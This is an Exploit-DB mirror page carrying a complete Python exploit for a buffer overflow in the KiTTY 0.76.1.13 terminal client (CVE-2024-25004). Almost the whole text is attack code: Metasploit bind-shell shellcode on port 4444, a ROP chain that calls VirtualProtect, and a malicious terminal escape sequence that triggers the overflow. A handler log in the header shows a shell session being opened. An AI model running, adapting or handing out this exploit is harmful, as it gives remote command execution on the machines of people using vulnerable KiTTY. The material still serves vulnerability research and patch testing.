KiTTY 0.76.1.13 – ‘Start Duplicated Session Username’ Buffer Overflow

• Exploit Database
• 127 阅读

• 作者： DEFCESCO
  日期： 2024-03-14
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51891/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140

  # Exploit Title: KiTTY 0.76.1.13 - &apos;Start Duplicated Session Username&apos; Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-25004 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1# # msf6 payload(windows/shell_bind_tcp) ># # [*] Started bind TCP handler against 192.168.100.28:4444# # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------#   import sys import os import struct   #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b &apos;\x00\x07\x0a\x0d\x1b\x9c&apos; -f py # # windows/shell_bind_tcp - 355 bytes# # https://metasploit.com/ # # Encoder: x86/shikata_ga_nai # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,# # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true# #-------------------------------------------------------------------------------------#   buf =b"" buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e" buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90" buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d" buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e" buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f" buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52" buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e" buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a" buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a" buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22" buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7" buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a" buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7" buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf" buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd" buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12" buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17" buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81" buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40" buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0" buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30" buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3" buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56" buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb" buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3" buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39" buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea" buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e" buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c" buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c"     def shellcode(): sc = b&apos;&apos; sc += b&apos;\xBB\x44\x24\x44\x44&apos; # movebx,0x44442444 sc += b&apos;\xB8\x44\x44\x44\x44&apos; # moveax,0x44444444 sc += b&apos;\x29\xD8&apos; # subeax,ebx sc += b&apos;\x29\xC4&apos; # subesp,eax sc += buf sc += b&apos;\x90&apos; * (1042-len(sc)) assert len(sc) == 1042 return sc     def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832,# POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4,# ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x41414141,# Filler (compensate) 0x00484e07,# MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6,# XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953,# POP EBP # RETN [kitty.exe] 0x005405b0,# PUSH ESP; RETN 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9,# POP EBX # RETN [kitty.exe] 0x00000201,# 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce,# POP EDX # RETN [kitty.exe] 0x00000040,# 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c,# POP ECX # RETN [kitty.exe] 0x004d81d9,# &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404,# POP EDI # RETN [kitty.exe] 0x005a2001,# RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011,# POP EAX # POP EBX # RETN [kitty.exe] 0x90909090,# nop 0x41414141,# Filler (compensate) #[---INFO:pushad:---] 0x005dfbac,# PUSHAD # RETN [kitty.exe] ] return b&apos;&apos;.join(struct.pack(&apos;<I&apos;, _) for _ in rop_gadgets)   rop_chain = create_rop_chain()     #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d # # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : # # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}# # Shellcode size at ESP: 1042 bytes# #----------------------------------------------------------------------------------#   return_address = struct.pack(&apos;<I&apos;,0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN** [kitty.exe] ** |startnull {PAGE_EXECUTE_READWRITE}   rop_chain_padding = b&apos;\x90&apos; * 27 nops = b&apos;\x90&apos; * 88   escape_sequence = b&apos;\033]0;__dt:localhost:&apos; + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b&apos;\xE9\x3D\xFA\xFF\xFF&apos; # jmp $eip-1471 escape_sequence += nops + b&apos;\007&apos;   stdout = os.fdopen(sys.stdout.fileno(), &apos;wb&apos;) stdout.write(escape_sequence) stdout.flush()